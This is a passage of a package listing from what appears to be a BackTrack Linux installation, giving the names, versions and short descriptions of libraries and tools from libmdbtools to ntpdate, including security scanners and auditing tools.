2.05-1
ii libmdbtools
mdbtools libraries
0.5.99.0.6pre1.0.20051109-6
ii libmetacity-private0
library for the Metacity window manager
1:2.30.1-0ubuntu1.1
ii libmng1
Multiple-image Network Graphics library
1.0.9-1ubuntu1
ii libmodplug0c2
1:0.8.7-1build1
shared libraries for mod music based on ModPlug
ii libmp3lame0
An MP3 encoding library
ii libmpcdec3
Musepack (MPC) format library
1:1.2.2-2.1ubuntu1
ii libmpeg2-4
MPEG1 and MPEG2 video decoder library
0.4.1-3
ii libmpfr1ldbl
2.4.2-3ubuntu1
multiple precision floating-point computation
ii libmpg123-0
1.12.1-0ubuntu1
MPEG layer 1/2/3 audio decoder -- runtime library
ii libmulticobex1
multi-protocol cable OBEX library
0.23-1
ii libmutter-private0
library for the Mutter window manager
2.28.1~git20091208-1ubuntu7
ii libmysqlclient16
MySQL database client library
5.1.41-3ubuntu12.10
ii libnautilus-extension1
1:2.31.1-0ubuntu2~ppa92
libraries for nautilus components - runtime version
ii libncp
2.2.6-7
shared library used by programs that use NetWare Core Protocol
ii libncurses5
shared libraries for terminal handling
5.7+20090803-2ubuntu3
ii libncurses5-dev
5.7+20090803-2ubuntu3
developer's libraries and docs for ncurses
ii libncursesw5
5.7+20090803-2ubuntu3
shared libraries for terminal handling (wide character support)
ii libneon27-gnutls
0.29.0-1
An HTTP and WebDAV client library (GnuTLS enabled)
ii libnet-daemon-perl
0.43-1
Perl module for building portable Perl daemons easily
ii libnet-dns-perl
Perform DNS queries from a Perl script
0.65-1build1
ii libnet-ip-perl
1.25-2
Perl extension for manipulating IPv4/IPv6 addresses
ii libnet-libidn-perl
Perl bindings for GNU Libidn
0.12.ds-1
ii libnet-netmask-perl
1.9015-3
parse, manipulate and lookup IP network blocks
ii libnet-pcap-perl
0.16-2
Perl binding to the LBL pcap packet capture library
ii libnet-rawip-perl
Perl interface to lowlevel TCP/IP
0.25-1
ii libnet-smtp-ssl-perl
SSL support for Net::SMTP
1.01-2
ii libnet-snmp-perl
Script SNMP connections
5.2.0-3
ii libnet-ssleay-perl
1.35-2ubuntu1
Perl module for Secure Sockets Layer (SSL)
ii libnet1
1.1.4-2
library for the construction and handling of network packets
ii libnet6-1.3-0
Network access framework for IPv4/IPv6
1:1.3.11-1
ii libnetpacket-perl
0.41.1-1
Modules to assemble/disassemble network packets at the protocol level
ii libnetpbm10
2:10.0-12.1ubuntu1
Graphics conversion tools shared libraries
ii libnewt0.52
0.52.10-5ubuntu1
Not Erik's Windowing Toolkit - text mode windowing with slang
ii libnfsidmap2
An nfs idmapping library
0.23-2
ii libnids1.21
1.23-1.1
IP defragmentation TCP segment reassembly library
ii libnih-dbus1
NIH D-Bus Bindings Library
1.0.1-1
ii libnih1
NIH Utility Library
1.0.1-1
ii libnl1
1.1-5build1
library for dealing with netlink sockets
ii libnmap-parser-perl
parse nmap scan data with perl
1.05-2
ii libnotify1
0.4.5-1ubuntu4
sends desktop notifications to a notification daemon
ii libnspr4-0d
NetScape Portable Runtime Library
4.8.6-0ubuntu0.10.04.2
ii libnss-mdns
0.10-3ubuntu4
NSS module for Multicast DNS name resolution
ii libnss3-1d
Network Security Service libraries
3.12.9+ckbi-1.82-0ubuntu0.10.04.1
ii libntfs-3g75
1:2010.3.6-1ubuntu1
ntfs-3g filesystem in userspace (FUSE) library
ii libntfs10
2.0.0-1ubuntu4
library that provides common NTFS access functions
ii libobexftp0
object exchange file transfer library
0.23-1
ii libogg0
Ogg bitstream library
1.1.4~dfsg-2
ii liboil0.3
Library of Optimized Inner Loops
0.3.16-1ubuntu2
ii liboop4
Event loop management library
1.0-6
ii libopenal1
1:1.12.854-0ubuntu1~lucid1
Software implementation of the OpenAL API (shared library)
ii libopenexr6
1.6.1-4.1
runtime files for the OpenEXR image library
ii libopenobex1
OBEX protocol library
1.5-2build1
ii libopenssl-ruby
OpenSSL interface for Ruby
4.2-2~uorppa0
ii libopenssl-ruby1.8
OpenSSL interface for Ruby 1.8
1.8.7.249-2
ii libopenssl-ruby1.9.2
OpenSSL interface for Ruby 1.9.2
ii liborbit2
libraries for ORBit2 - a CORBA ORB
1:2.14.18-0.1
ii libpam-ck-connector
ConsoleKit PAM module
0.4.1-3ubuntu2
ii libpam-gnome-keyring
2.92.92.is.2.30.3-0ubuntu1.1
PAM module to unlock the GNOME keyring upon login
ii libpam-modules
1.1.1-2ubuntu5.1
Pluggable Authentication Modules for PAM
ii libpam-runtime
Runtime support for the PAM library
1.1.1-2ubuntu5.1
ii libpam0g
1.1.1-2ubuntu5.1
Pluggable Authentication Modules library
ii libpanel-applet2-0
library for GNOME Panel applets
1:2.30.2-0ubuntu0.2
ii libpango1.0-0
1.28.0-0ubuntu2.2
Layout and rendering of internationalized text
ii libpango1.0-common
1.28.0-0ubuntu2.2
Modules and configuration files for the Pango
ii libpangomm-1.4-1
2.26.2-0ubuntu1
C++ Wrapper for pango (shared libraries)
ii libpaper-utils
1.1.23+nmu1build1
library for handling paper characteristics (utilities)
ii libpaper1
1.1.23+nmu1build1
library for handling paper characteristics
ii libparse-debianchangelog-perl
1.1.1-2ubuntu2
parse Debian changelogs and output them in other formats
ii libparted0debian1
2.2-5ubuntu5.1
The GNU Parted disk partitioning shared library
ii libpcap-dev
1.0.0-6
development library for libpcap (transitional package)
ii libpcap0.8
1.0.0-6
system interface for user-level packet capture
ii libpcap0.8-dev
1.0.0-6
development library and header files for libpcap0.8
ii libpci3
Linux PCI Utilities (shared library)
1:3.0.0-4ubuntu17
ii libpciaccess0
Generic PCI access library for X
0.11.0-1
ii libpcre3
7.8-3build1
Perl 5 Compatible Regular Expression Library - runtime files
ii libpcsclite1
1.5.3-1ubuntu4.2
Middleware to access a smart card using PC/SC (library)
ii libperl5.10
shared Perl library
ii libphonon4
0ubuntu1~lucid1~ppa1
framework
5.10.1-8ubuntu2.1
4:4.7.0really4.4.2the core library of the Phonon multimedia
ii libpixman-1-0
0.16.4-1ubuntu2
pixel-manipulation library for X and cairo
ii libpkcs11-helper1
1.07-1build1
library that simplifies the interaction with PKCS#11
ii libplist1
1.1-1ubuntu1
Library for handling Apple binary and XML property lists
ii libplrpc-perl
0.2020-2
Perl extensions for writing PlRPC servers and clients
ii libplymouth2
0.8.2-2ubuntu2.2
graphical boot animation and logger - shared libraries
ii libpng12-0
PNG library - runtime
1.2.42-1ubuntu2.1
ii libpolkit-agent-1-0
PolicyKit Authentication Agent API
0.96-2ubuntu0.1
ii libpolkit-backend-1-0
PolicyKit backend API
0.96-2ubuntu0.1
ii libpolkit-gobject-1-0
PolicyKit Authorization API
0.96-2ubuntu0.1
ii libpoppler5
PDF rendering library
0.12.4-0ubuntu5.1
ii libpopt0
lib for parsing cmdline parameters
1.15-1
ii libportaudio0
Portable audio I/O - shared library
18.1-7.1
ii libportaudio2
Portable audio I/O - shared library
19+svn20090620-0ubuntu2
ii libpq5
PostgreSQL C client library
8.4.8-0ubuntu0.10.04
ii libprelude2
1.0.0~rc1-1
Security Information Management System [ Base library ]
ii libproxy0
0.3.1-1ubuntu1
automatic proxy configuration management library (shared)
ii libpst4
0.6.41-0ubuntu4
Shared library needed by the readpst utilities, and
ii libpthread-stubs0
0.3-2
pthread stubs not provided by native libc
ii libpthread-stubs0-dev
0.3-2
pthread stubs not provided by native libc, development files
ii libpulse-browse0
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio client libraries (zeroconf support)
ii libpulse-mainloop-glib0
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio client libraries (glib support)
ii libpulse0
1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1 PulseAudio client libraries
ii libpython2.6
2.6.5-1ubuntu6
Shared Python runtime library (version 2.6)
ii libqt3-mt
3:3.3.8-b-6ubuntu2
Qt GUI Library (Threaded runtime version), Version 3
ii libqt4-dbus
Qt 4 D-Bus module
4:4.7.0-0ubuntu2~lucid1~ppa2
ii libqt4-designer
Qt 4 designer module
ii libqt4-help
Qt 4 help module
ii libqt4-network
Qt 4 network module
ii libqt4-script
Qt 4 script module
ii libqt4-scripttools
Qt 4 script tools module
ii libqt4-sql
Qt 4 SQL module
ii libqt4-sql-mysql
Qt 4 MySQL database driver
ii libqt4-svg
Qt 4 SVG module
ii libqt4-test
Qt 4 test module
ii libqt4-xml
Qt 4 XML module
ii libqt4-xmlpatterns
Qt 4 XML patterns module
ii libqtcore4
Qt 4 core module
ii libqtgui4
Qt 4 GUI module
ii libqtwebkit4
Web content engine library for Qt
2.0.0-0ubuntu1~lucid1~ppa1
ii libqwt5-qt4
5.2.0-1build1
Qt4 widgets library for technical applications (runtime)
ii librarian0
0.8.1-4ubuntu1
Documentation meta-data library (library package)
ii libraw1394-11
2.0.4-1ubuntu2
library for direct access to IEEE 1394 bus (aka FireWire)
ii libreadline-ruby
Readline interface for Ruby
4.2-2~uorppa0
ii libreadline-ruby1.8
Readline interface for Ruby 1.8
1.8.7.249-2
ii libreadline-ruby1.9.2
Readline interface for Ruby 1.9.2
ii libreadline5
5.2-7build1
GNU readline and history libraries, run-time libraries
ii libreadline5-dev
5.2-7build1
GNU readline and history libraries, development files
ii libreadline6
6.1-1
GNU readline and history libraries, run-time libraries
ii librpc-xml-perl
Perl module implementation of XML-RPC
0.72-1
ii librpcsecgss3
0.19-2
allows secure rpc communication using the rpcsec_gss protocol
ii librpm0
RPM shared library
4.7.2-1lbuild1
ii librpmio0
RPM IO shared library
4.7.2-1lbuild1
ii librrd4
1.3.8-1ubuntu1
Time-series data storage and display system (runtime library)
ii librsvg2-2
2.26.3-0ubuntu1
SAX-based renderer library for SVG files (runtime)
ii librsvg2-common
2.26.3-0ubuntu1
SAX-based renderer library for SVG files (extra runtime)
ii libruby1.8
Libraries necessary to run Ruby 1.8
1.8.7.249-2
ii libruby1.9.2
Libraries necessary to run Ruby 1.9.2
ii libruli4
0.33-1.1
Library for easily querying DNS SRV records
ii libsamplerate0
Audio sample rate conversion library
0.1.7-3
ii libsasl2-2
2.1.23.dfsg1-5ubuntu1
Cyrus SASL - authentication abstraction library
ii libsasl2-modules
2.1.23.dfsg1-5ubuntu1
Cyrus SASL - pluggable authentication modules
ii libschroedinger-1.0-0
1.0.9.is.1.0.8-0ubuntu1
library for encoding/decoding of Dirac video streams
ii libsdl-image1.2
1.2.10-1
image loading library for Simple DirectMedia Layer 1.2
ii libsdl1.2debian
Simple DirectMedia Layer
1.2.14-4ubuntu1.1
ii libsdl1.2debian-alsa
1.2.14-4ubuntu1.1
Simple DirectMedia Layer (with X11 and ALSA options)
ii libselinux1
SELinux runtime shared libraries
2.0.89-4
ii libsensors4
1:3.1.2-2
library to read temperature/voltage/fan sensors
ii libsepol1
2.0.40-2
SELinux library for manipulating binary security policies
ii libsexy2
0.1.11-2build2
collection of additional GTK+ widgets - library
ii libsgutils2-2
1.28-2
utilities for working with generic SCSI devices (shared libraries)
ii libshout3
2.2.2-5ubuntu1
MP3/Ogg Vorbis broadcast streaming library
ii libsigc++-2.0-0c2a
2.2.4.2-1
type-safe Signal Framework for C++ - runtime
ii libslang2
2.2.2-2ubuntu1
The S-Lang programming library - runtime version
ii libslp1
OpenSLP libraries
1.2.1-7.6ubuntu0.1
ii libsm-dev
2:1.1.1-1
X11 Session Management library (development headers)
ii libsm6
X11 Session Management library
2:1.1.1-1
ii libsmbclient
2:3.4.7~dfsg-1ubuntu3.6
shared library for communication with SMB/CIFS servers
ii libsmi2-common
0.4.8+dfsg2-2
a library to access SMI MIB information - MIB module files
ii libsmi2ldbl
library to access SMI MIB information
0.4.8+dfsg2-2
ii libsndfile1
Library for reading/writing audio files
1.0.21-2
ii libsnmp-base
5.4.2.1~dfsg0ubuntu1-0ubuntu2.1
SNMP (Simple Network Management Protocol) MIBs and documentation
ii libsnmp15
SNMP (Simple Network Management Protocol) library
ii libsoup-gnome2.4-1
2.30.2-0ubuntu0.1
an HTTP library implementation in C -- GNOME support library
ii libsoup2.4-1
2.30.2-0ubuntu0.1
an HTTP library implementation in C -- Shared library
ii libsox-fmt-all
All SoX format libraries
14.3.0-1.1build1
ii libsox-fmt-alsa
SoX alsa format I/O library
14.3.0-1.1build1
ii libsox-fmt-ao
SoX Libao format I/O library
14.3.0-1.1build1
ii libsox-fmt-base
Minimal set of SoX format libraries
14.3.0-1.1build1
ii libsox-fmt-ffmpeg
SoX ffmpeg format library
14.3.0-1.1build1
ii libsox-fmt-mp3
SoX MP3 format library
14.3.0-1.1build1
ii libsox-fmt-oss
SoX OSS format I/O library
14.3.0-1.1build1
ii libsox-fmt-pulse
SoX PulseAudio format I/O library
14.3.0-1.1build1
ii libsox1a
14.3.0-1.1build1
SoX library of audio effects and processing
ii libspeex1
The Speex codec runtime library
1.2~rc1-1ubuntu1
ii libspeexdsp1
The Speex extended runtime library
1.2~rc1-1ubuntu1
ii libsqlite0
SQLite shared library
2.8.17-6build2
ii libsqlite3-0
SQLite 3 shared library
3.6.22-1
ii libsqlite3-dev
SQLite 3 development files
3.6.22-1
ii libsqlite3-ruby
SQLite3 interface for Ruby
1.2.4-2.1
ii libsqlite3-ruby1.8
SQLite3 interface for Ruby 1.8
1.2.4-2.1
ii libss2
command-line interface parsing library
1.41.11-1ubuntu2.1
ii libssh-4
A tiny C SSH library
0.4.2-1ubuntu1
ii libssh2-1
SSH2 client-side library
1.2.2-1
ii libssl0.9.8
SSL shared libraries
0.9.8k-7ubuntu8.6
ii libstartup-notification0
0.10-1build1
library for program launch feedback (shared library)
ii libstdc++6
The GNU Standard C++ Library v3
4.4.3-4ubuntu5
ii libstdc++6-4.4-dev
4.4.3-4ubuntu5
The GNU Standard C++ Library v3 (development files)
ii libstree
A generic suffix tree library.
0.4.3-bt0
ii libsub-name-perl
Assigns a new name to referenced sub
0.04-1build1
ii libsvn1
Shared libraries used by Subversion
1.6.6dfsg-2ubuntu1.2
ii libsybdb5
0.82-6build1
libraries for connecting to MS SQL and Sybase SQL servers
ii libsys-hostname-long-perl
1.4-2
Figure out the long (fully-qualified) hostname
ii libsysfs2
interface library to sysfs
2.1.0-6
ii libtag1-vanilla
1.6.3-0ubuntu1
TagLib Audio Meta-Data Library (Vanilla flavour)
ii libtag1c2a
TagLib Audio Meta-Data Library
1.6.3-0ubuntu1
ii libtalloc2
2.0.1-1
hierarchical pool based memory allocator
ii libtasn1-3
Manage ASN.1 structures (runtime)
2.4-1
ii libtdb1
Trivial Database - shared library
1.2.0-1
ii libterm-readkey-perl
2.30-4build1
A perl module for simple terminal control
ii libterm-readline-gnu-perl
1.19-2
Perl extension for the GNU Readline/History Library
ii libtext-charwidth-perl
0.04-6
get display widths of characters on the terminal
ii libtext-csv-perl
1.16-1
comma-separated values manipulator (using XS or PurePerl)
ii libtext-csv-xs-perl
0.70-1
Perl C/XS module to process Comma-Separated Value files
ii libtext-iconv-perl
converts between character sets in Perl
1.7-2
ii libtext-wrapi18n-perl
0.06-7
internationalized substitute of Text::Wrap
ii libthai-data
0.1.13-1build1
Data files for Thai language support library
ii libthai0
Thai language support library
0.1.13-1build1
ii libtheora0
The Theora Video Compression Codec
1.1.1+dfsg.1-3
ii libtidy-0.99-0
20091223cvs-1
HTML syntax checker and reformatter - library
ii libtie-ixhash-perl
ordered associative arrays for Perl
1.21-2
ii libtiff4
Tag Image File Format (TIFF) library
3.9.2-2ubuntu0.7
ii libtimedate-perl
Time and date functions for Perl
1.1900-1
ii libtre5
0.8.0-2
regexp matching library with approximate matching
ii libts-0.0-0
touch screen library
1.0-7build1
ii libudev0
udev library
151-12.3
ii libumfpack5.4.0
sparse LU factorization library
1:3.4.0-1ubuntu3
ii libunique-1.0-0
1.1.6-1ubuntu2
Library for writing single instance applications - shared libraries
ii libupower-glib1
0.9.1-1
abstraction for power management - shared library
ii liburi-perl
1.52-1
module to manipulate and access URI strings
ii libusb-0.1-4
userspace USB programming library
2:0.1.12-14ubuntu0.2
ii libusb-1.0-0
userspace USB programming library
2:1.0.6-1
ii libusbmuxd1
1.0.2-1ubuntu2
USB multiplexor daemon for iPhone and iPod Touch devices - library
ii libuuid1
Universally Unique ID library
2.17.2-0ubuntu1.10.04.2
ii libv4l-0
0.6.4-1ubuntu1
Collection of video4linux support libraries
ii libvisual-0.4-0
Audio visualization framework
0.4.0-2.1+ubuntu2
ii libvisual-0.4-plugins
Audio visualization framework plugins
0.4.0.dfsg.1-2ubuntu5
ii libvorbis0a
1.2.3-3ubuntu1
The Vorbis General Audio Compression Codec (Decoder library)
ii libvorbisenc2
1.2.3-3ubuntu1
The Vorbis General Audio Compression Codec (Encoder library)
ii libvorbisfile3
1.2.3-3ubuntu1
The Vorbis General Audio Compression Codec (High Level API)
ii libvte-common
1:0.23.5-0ubuntu1.1
Terminal emulator widget for GTK+ 2.0 - common files
ii libvte9
1:0.23.5-0ubuntu1.1
Terminal emulator widget for GTK+ 2.0 - runtime files
ii libwavpack1
4.60.1-1
an audio codec (lossy and lossless) - library
ii libwbclient0
Samba winbind client library
ii libwhisker2-perl
Perl module geared for HTTP testing
2.4-1
ii libwmf0.2-7
Windows metafile conversion library
0.2.8.4-6.1ubuntu2
ii libwnck-common
1:2.30.0-0ubuntu1
Window Navigator Construction Kit - common files
ii libwnck22
1:2.30.0-0ubuntu1
Window Navigator Construction Kit - runtime files
ii libwrap0
Wietse Venema's TCP wrappers library
7.6.q-18
ii libwww-mechanize-perl
1.58-1
module to automate interaction with websites
ii libwww-perl
Perl HTTP/WWW client/server library
5.834-1ubuntu0.1
ii libwxbase2.8-0
2.8.10.1-0ubuntu1.2
wxBase library (runtime) - non-GUI support classes of wxWidgets toolkit
ii libwxgtk2.8-0
2.8.10.1-0ubuntu1.2
wxWidgets Cross-platform C++ GUI toolkit (GTK+ runtime)
ii libx11-6
X11 client-side library
2:1.3.2-1ubuntu3
ii libx11-data
X11 client-side library
2:1.3.2-1ubuntu3
ii libx11-dev
2:1.3.2-1ubuntu3
X11 client-side library (development headers)
ii libx86-1
x86 real-mode library
1.1+ds1-6
ii libxapian15
Search engine library
1.0.18-1
ii libxau-dev
1:1.0.5-1
X11 authorisation library (development headers)
ii libxau6
X11 authorisation library
1:1.0.5-1
ii libxaw7
X11 Athena Widget library
2:1.0.7-1
ii libxcb-atom1
0.3.6-1build1
utility libraries for X C Binding -- atom
ii libxcb-aux0
0.3.6-1build1
utility libraries for X C Binding -- aux
ii libxcb-event1
0.3.6-1build1
utility libraries for X C Binding -- event
ii libxcb-render-util0
0.3.6-1build1
utility libraries for X C Binding -- render-util
ii libxcb-render0
X C Binding, render extension
1.5-2
ii libxcb-shape0
X C Binding, shape extension
1.5-2
ii libxcb-shm0
X C Binding, shm extension
1.5-2
ii libxcb-xv0
X C Binding, xv extension
1.5-2
ii libxcb1
X C Binding
1.5-2
ii libxcb1-dev
X C Binding, development files
1.5-2
ii libxcomposite1
X11 Composite extension library
1:0.4.1-1
ii libxcursor1
X cursor management library
1:1.1.10-1
ii libxdamage1
X11 damaged region extension library
1:1.1.2-1
ii libxdmcp-dev
1:1.0.3-1
X11 authorisation library (development headers)
ii libxdmcp6
1:1.0.3-1
X11 Display Manager Control Protocol library
ii libxext6
X11 miscellaneous extension library
2:1.1.1-2
ii libxfixes3
1:4.0.4-1
X11 miscellaneous 'fixes' extension library
ii libxfont1
X11 font rasterisation library
1:1.4.1-1
ii libxft2
2.1.14-1ubuntu1
FreeType-based font drawing library for X
ii libxi6
X11 Input extension library
2:1.3-3
ii libxine1
1.1.17-1ubuntu3
the xine video/media player library, meta-package
ii libxine1-bin
1.1.17-1ubuntu3
the xine video/media player library, binary files
ii libxine1-console
1.1.17-1ubuntu3
libaa/libcaca/framebuffer/directfb related plugins for libxine1
ii libxine1-misc-plugins
1.1.17-1ubuntu3
Input, audio output and post plugins for libxine1
ii libxine1-x
1.1.17-1ubuntu3
X desktop video output plugins for libxine1
ii libxinerama1
X11 Xinerama extension library
2:1.1-2
ii libxkbfile1
X11 keyboard file manipulation library
1:1.0.6-1
ii libxklavier16
X Keyboard Extension high-level API
5.0-0ubuntu1
ii libxml-libxml-perl
Perl interface to the libxml2 library
1.70.ds-1
ii libxml-namespacesupport-perl
1.09-3
Perl module for supporting simple generic namespaces
ii libxml-parser-perl
Perl module for parsing XML files
2.36-1.1build3
ii libxml-sax-expat-perl
0.40-1
Perl module for a SAX2 driver for Expat (XML::Parser)
ii libxml-sax-perl
0.96+dfsg-2
Perl module for using and building Perl SAX2 XML processors
ii libxml-simple-perl
Perl module for reading and writing XML
2.18-3
ii libxml-twig-perl
1:3.32-3ubuntu1
Perl module for processing huge XML documents in tree mode
ii libxml-writer-perl
Perl module for writing XML documents
0.605-1
ii libxml-xpath-perl
Perl module for processing XPath
1.13-7
ii libxml2
GNOME XML library
2.7.6.dfsg-1ubuntu1.1
ii libxml2-dev
Development files for the GNOME XML library
ii libxml2-utils
XML utilities
ii libxmu6
X11 miscellaneous utility library
2:1.0.5-1
ii libxmuu1
X11 miscellaneous micro-utility library
2:1.0.5-1
ii libxpm4
X11 pixmap library
1:3.5.8-1
ii libxrandr2
X11 RandR extension library
2:1.3.0-3
ii libxrender1
X Rendering Extension client library
1:0.9.5-1
ii libxres1
X11 Resource extension library
2:1.0.4-1
ii libxslt1-dev
1.1.26-1ubuntu1
XSLT processing library - development kit
ii libxslt1.1
1.1.26-1ubuntu1
XSLT processing library - runtime library
ii libxss1
X11 Screen Saver extension library
1:1.2.0-2
ii libxt-dev
1:1.0.7-1
X11 toolkit intrinsics library (development headers)
ii libxt6
X11 toolkit intrinsics library
1:1.0.7-1
ii libxtst6
2:1.1.0-2
X11 Testing -- Resource extension library
ii libxv1
X11 Video extension library
2:1.0.5-1
ii libxvmc1
X11 Video extension library
2:1.0.5-1ubuntu1
ii libxxf86dga1
2:1.1.1-2
X11 Direct Graphics Access extension library
ii libxxf86misc1
1:1.0.2-1
X11 XFree86 miscellaneous extension library
ii libxxf86vm1
1:1.1.0-2
X11 XFree86 video mode extension library
ii libyaml-0-2
0.1.3-1
Fast YAML 1.1 parser and emitter library
ii libyaml-perl
YAML Ain't Markup Language
0.71-1
ii libyaml-syck-perl
1.07-1build1
fast, lightweight YAML loader and dumper
ii linux-firmware
Linux Kernel Firmware
2.0-bt4
ii linux-image
1.1-bt1
BackTrack Linux Kernel Image Virtual Package
rc linux-image-2.6.32-28-generic-pae
2.6.32-28.55
Linux kernel image for version 2.6.32 on x86
ii linux-image-2.6.38
2.6.38-10.00.Custom
Linux kernel binary image for version 2.6.38
rc linux-image-2.6.38-rc7
2.6.38-rc7-10.00.Custom
Linux kernel binary image for version 2.6.38-rc7
rc linux-image-2.6.38-rc8
2.6.38-rc8-10.00.Custom
Linux kernel binary image for version 2.6.38-rc8
ii linux-libc-dev
Linux Kernel Headers for development
2.6.32-29.58
ii linux-sound-base
1.0.22.1+dfsg-0ubuntu3
base package for ALSA and OSS sound systems
ii linux-source
1.1-bt1
BackTrack Linux Kernel Source Virtual Package
ii linux-source-2.6.38
2.6.38-10.00.Custom
Linux kernel source for version 2.6.38
rc linux-source-2.6.38-rc7
2.6.38-rc7-10.00.Custom
Linux kernel source for version 2.6.38-rc7
rc linux-source-2.6.38-rc8
2.6.38-rc8-10.00.Custom
Linux kernel source for version 2.6.38-rc8
ii list-urls
Extract URLS from a web page.
3.0-bt2
ii lm-sensors
1:3.1.2-2
utilities to read temperature/voltage/fan sensors
ii lmodern
2.004.1-3
scalable PostScript and OpenType fonts based on Computer Modern
ii localechooser-data
2.12ubuntu3
Lists of locales supported by the installer
ii locales
common files for locale support
2.11+git20100304-3
ii lockfile-progs
0.1.13ubuntu1
Programs for locking and unlocking files and mailboxes
ii login
system login tools
1:4.1.4.2-1ubuntu2.2
ii logrotate
Log rotation utility
3.7.8-4ubuntu2.1
ii lsb-base
4.0-0ubuntu8
Linux Standard Base 4.0 init script functionality
ii lsb-release
4.0-0ubuntu8
Linux Standard Base version reporting utility
ii lshw
02.14-1build1
information about hardware configuration
ii lsof
List open files
4.81.dfsg.1-1build1
ii ltrace
0.5.3-2ubuntu3
Tracks runtime library calls in dynamically linked programs
ii luatex
next generation TeX engine
0.50.0-1
ii lzma
4.43-14ubuntu2
Compression method of 7z format in 7-Zip program
ii m4
a macro processing language
1.4.13-3
ii macchanger
1.5.0-bt2
A GNU/Linux utility for viewing/manipulating the MAC address of network
interfaces.
ii magicrescue
1.19-bt0
Scans a block device for file types it knows how to recover and calls an
external program to extract them.
ii magictree
r1492-bt1
A penetration tester productivity tool which allows easy and straightforward
data consolidation
ii make
An utility for Directing compilation.
3.81-7ubuntu1
ii makedev
creates device files in /dev
2.3.1-89ubuntu1
ii maltego
OSINT software
3.0-bt4
ii man-db
on-line manual pager
2.5.7-2ubuntu1
ii manpages
3.23-1
Manual pages about using a GNU/Linux system
ii manpages-dev
3.23-1
Manual pages about using GNU/Linux for development
ii
mantra
0.01-bt0
Mantra is a security framework which can be very helpful in performing all the
five phases of attacks including reconnaissance, scanning and enumeration,
ii mawk
1.3.3-15ubuntu2
a pattern scanning and text processing language
ii md5deep
3.4-bt0
A set of programs to compute MD5, SHA-1, SHA-256, Tiger, or Whirlpool message
digests on an arbitrary number of files.
ii mdbtools
JET / MS Access database (MDB) tools
0.5.99.0.6pre1.0.20051109-6
ii mdk3
6.0-bt1
MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol
weaknesses using the oslib of aircrack-ng.
ii medusa
parallel network login auditor
2.0-bt4
ii memtest86+
thorough real-mode memory tester
4.00-2ubuntu3
ii menu
2.1.43ubuntu1
generates programs menu for all menu-aware applications
ii mesa-utils
Miscellaneous Mesa GL utilities
7.7.1-1ubuntu3
ii metacity
lightweight GTK+ window manager
1:2.30.1-0ubuntu1.1
ii metacity-common
1:2.30.1-0ubuntu1.1
shared files for the Metacity window manager
ii metagoofil
2.0-bt1
Metagoofil is a tool for extracting metadata of public documents
(pdf,doc,xls,ppt) availables in the target websites.
ii mime-support
3.48-1ubuntu1
MIME files 'mime.types' & 'mailcap', and support programs
ii min12xxw
0.0.9-3ubuntu2
Printer driver for KonicaMinolta PagePro 1[234]xxW
ii mingw
3.14-bt0
A minimalist development environment for native Microsoft Windows
applications.
ii miranda
1.0-bt0
Miranda is a Python-based Universal Plug-N-Play client application designed to
discover, query and interact with UPNP devices, particularly Internet Gatew
ii
miredo
1.2.3-bt5
Miredo is an open-source Teredo IPv6 tunneling software, for Linux and the BSD
operating systems. It includes functional implementations of all components
ii missidentify
1.0-bt0
Miss Identify is a program to find Win32 applications.
ii mlocate
0.22.2-1ubuntu1
quickly find files on the filesystem based on their name
ii module-init-tools
tools for managing Linux kernel modules
3.11.1-2ubuntu1
ii mopest
PHP web vulnerability scanner.
2.0-bt0
ii mork.pl
1.0-bt0
This script lets you extract the URLs from your Mozilla history file, sorted
by last access time.
ii mount
2.17.2-0ubuntu1.10.04.2
Tools for mounting and manipulating filesystems
ii mountall
filesystem mounting tool
2.15.3
ii mousetweaks
2.30.0-0ubuntu1
mouse accessibility enhancements for the GNOME desktop
ii mpg123
MPEG layer 1/2/3 audio player
1.12.1-0ubuntu1
ii mtools
Tools for manipulating MSDOS files
4.0.10-1ubuntu1
ii mtr-tiny
Full screen ncurses traceroute tool
0.75-2build1
ii mutter
lightweight GTK+ window manager
2.28.1~git20091208-1ubuntu7
ii mutter-common
2.28.1~git20091208-1ubuntu7
shared files for the Mutter window manager
ii mysql-client-5.1
MySQL database client binaries
5.1.41-3ubuntu12.10
ii mysql-client-core-5.1
MySQL database core client binaries
5.1.41-3ubuntu12.10
ii mysql-common
5.1.41-3ubuntu12.10
MySQL database common files (e.g. /etc/mysql/my.cnf)
ii mysql-server
5.1.41-3ubuntu12.10
MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.1
MySQL database server binaries
5.1.41-3ubuntu12.10
ii mysql-server-core-5.1
MySQL database core server files
5.1.41-3ubuntu12.10
ii nano
2.2.2-1
small, friendly text editor inspired by Pico
ii nasm
General-purpose x86 assembler
2.07-1
ii nautilus
1:2.31.1-0ubuntu2~ppa92
file manager and graphical shell for GNOME
ii nautilus-data
data files for nautilus
1:2.31.1-0ubuntu2~ppa92
ii nbtscan
1.5.1a-bt2
NBTscan is a program for scanning IP networks for NetBIOS name information.
ii ncrack
0.4-bt0
Ncrack is a high-speed network authentication cracking tool.
ii ncurses-base
basic terminal type definitions
5.7+20090803-2ubuntu3
ii ncurses-bin
terminal-related programs and man pages
5.7+20090803-2ubuntu3
ii nessus
Nessus vulnerability scanner by Tenable
4.4.1-bt5
ii net-tools
The NET-3 networking toolkit
1.60-23ubuntu2
ii netbase
Basic TCP/IP networking system
4.35ubuntu3
ii netcat
1.10-38
TCP/IP swiss army knife -- transitional package
ii netcat-traditional
TCP/IP swiss army knife
1.10-38
ii netdiscover
0.3beta6-bt4
Netdiscover is an active/passive address reconnaissance tool, mainly developed
for those wireless networks without dhcp server, when you are wardriving. I
ii netifera
1.0-bt4
Netifera is a new modular open source platform for creating network security
tools.
ii netmask
Tool for generating terse netmasks.
2.3.10-bt3
ii netpbm
2:10.0-12.1ubuntu1
Graphics conversion tools between image formats
ii nfs-common
1:1.2.0-4ubuntu4.1
NFS support files common to client and server
ii ngrep
grep for network traffic
1.45.ds2-9
ii nikto
2.1.4-bt4
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 6400 potentiall
ii nmap
NMAP port and vulnerability scanner
5.51-bt8
ii notification-daemon
0.4.0-2ubuntu2
a daemon that displays passive pop-up notifications
ii ntfs-3g
read-write NTFS driver for FUSE
1:2010.3.6-1ubuntu1
ii ntfsprogs
2.0.0-1ubuntu4
tools for doing neat things in NTFS partitions from Linux
ii ntpdate
1:4.2.4p8+dfsg-1ubuntu2.1
